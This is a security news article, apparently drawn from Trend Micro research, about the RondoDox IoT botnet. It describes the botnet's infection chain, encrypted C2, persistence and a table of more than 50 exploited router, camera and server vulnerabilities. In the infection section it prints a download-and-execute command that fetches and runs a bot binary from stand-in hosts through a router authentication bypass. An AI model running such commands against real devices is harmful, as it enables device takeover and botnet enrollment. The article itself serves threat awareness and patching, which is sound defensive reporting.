Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.
Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.
In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.
Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.
Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.
The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.
Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.
This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.
Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.
Infection Mechanism
RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.
Once a target is identified, the appropriate exploit payload—drawn from its extensive repository— is delivered.
For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:-
wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit – u admin – p ” – c ‘ wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox’
After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.
Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.
Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.
The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.
A timeline of the RondoDox vulnerability (Source – Trend Micro)
Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.
Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.
The table below provides a detailed overview of all 50+ vulnerabilities currently exploited by RondoDox, including their CVE identifiers, affected products, impact ratings, required exploit prerequisites, and CVSS 3.1 scores.
#Vendor / ProductCVE IDCWE / TypeStatusNotes1Nexxt Router FirmwareCVE-2022-44149CWE-78 (Command Injection)N-Day2D-Link RoutersCVE-2015-2051CWE-78N-Day3Netgear R7000 / R6400CVE-2016-6277CWE-78N-Day4Netgear (mini_httpd)CVE-2020-27867CWE-78N-Day5Apache HTTP ServerCVE-2021-41773CWE-22 (Path Traversal / RCE)N-Day6Apache HTTP ServerCVE-2021-42013CWE-22N-Day7TBK DVRsCVE-2024-3721CWE-78Targeted8TOTOLINK (setMtknatCfg)CVE-2025-1829CWE-78N-Day9Meteobridge Web InterfaceCVE-2025-4008CWE-78N-Day10D-Link DNS-320CVE-2020-25506CWE-78N-Day11Digiever DS-2105 ProCVE-2023-52163CWE-78N-Day12Netgear DGN1000CVE-2024-12847CWE-78N-Day13D-Link (multiple)CVE-2024-10914CWE-78N-Day14Edimax RE11S RouterCVE-2025-22905CWE-78N-Day15QNAP VioStor NVRCVE-2023-47565CWE-78N-Day16D-Link DIR-816CVE-2022-37129CWE-78N-Day17GNU Bash (ShellShock)CVE-2014-6271CWE-78 (Code Injection)N-Day / Historical18Dasan GPON Home RouterCVE-2018-10561CWE-287 (Auth Bypass)N-Day19Four-Faith Industrial RoutersCVE-2024-12856CWE-78N-Day20TP-Link Archer AX21CVE-2023-1389CWE-78Targeted21D-Link RoutersCVE-2019-16920CWE-78N-Day22Tenda (fromNetToolGet)CVE-2025-7414CWE-78N-Day23Tenda (deviceName)CVE-2020-10987CWE-78N-Day24LB-LINK RoutersCVE-2023-26801CWE-78N-Day25Linksys E-SeriesCVE-2025-34037CWE-78N-Day26AVTECH CCTVCVE-2024-7029CWE-78N-Day27TOTOLINK X2000RCVE-2025-5504CWE-78N-Day28ZyXEL P660HN-T1ACVE-2017-18368CWE-78N-Day29Hytec HWL-2511-SSCVE-2022-36553CWE-78N-Day30Belkin Play N750CVE-2014-1635CWE-120 (Buffer Overflow)N-Day31TRENDnet TEW-411BRPplusCVE-2023-51833CWE-78N-Day32TP-Link TL-WR840NCVE-2018-11714CWE-78N-Day33D-Link DIR820LA1CVE-2023-25280CWE-78N-Day34Billion 5200W-TCVE-2017-18369CWE-78N-Day35Cisco (multiple products)CVE-2019-1663CWE-119 (Memory Corruption)N-Day36TOTOLINK (setWizardCfg)CVE-2024-1781CWE-78N-Day37Hikvision NVR—Command InjectionNo CVEListed by Trend Micro w/o CVE38Dahua DVR—Remote Code ExecutionNo CVEListed by Trend Micro w/o CVE39Wavlink Routers—CWE-78No CVEListed by Trend Micro w/o CVE40ZTE ZXHN Router—CWE-78No CVEListed by Trend Micro w/o CVE41Seenergy NVR—Authentication BypassNo CVEListed by Trend Micro w/o CVE42Uniview NVR—CWE-78No CVEListed by Trend Micro w/o CVE43TP-Link TD-W8960N—CWE-78No CVEListed by Trend Micro w/o CVE44Dahua IP Camera—CWE-78No CVEListed by Trend Micro w/o CVE45HiSilicon Firmware—Buffer OverflowNo CVEListed by Trend Micro w/o CVE46Amcrest Camera—CWE-78No CVEListed by Trend Micro w/o CVE47Hikvision IP Camera—CWE-78No CVEListed by Trend Micro w/o CVE48LILIN Camera—CWE-78No CVEListed by Trend Micro w/o CVE49TP-Link WR941N—CWE-78No CVEListed by Trend Micro w/o CVE50Wavlink WL-WN575A3—CWE-78No CVEListed by Trend Micro w/o CVE51Dahua NVR—CWE-78No CVEListed by Trend Micro w/o CVE52Tenda AC6—CWE-78No CVEListed by Trend Micro w/o CVE53Hikvision DS-7108HGHI—CWE-78No CVEListed by Trend Micro w/o CVE54LB-LINK BL-WR450H—CWE-78No CVEListed by Trend Micro w/o CVE55ZTE ZXHN H108N—CWE-78No CVEListed by Trend Micro w/o CVE56Wavlink WL-WN531G3—CWE-78No CVEListed by Trend Micro w/o CVE
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers appeared first on Cyber Security News.
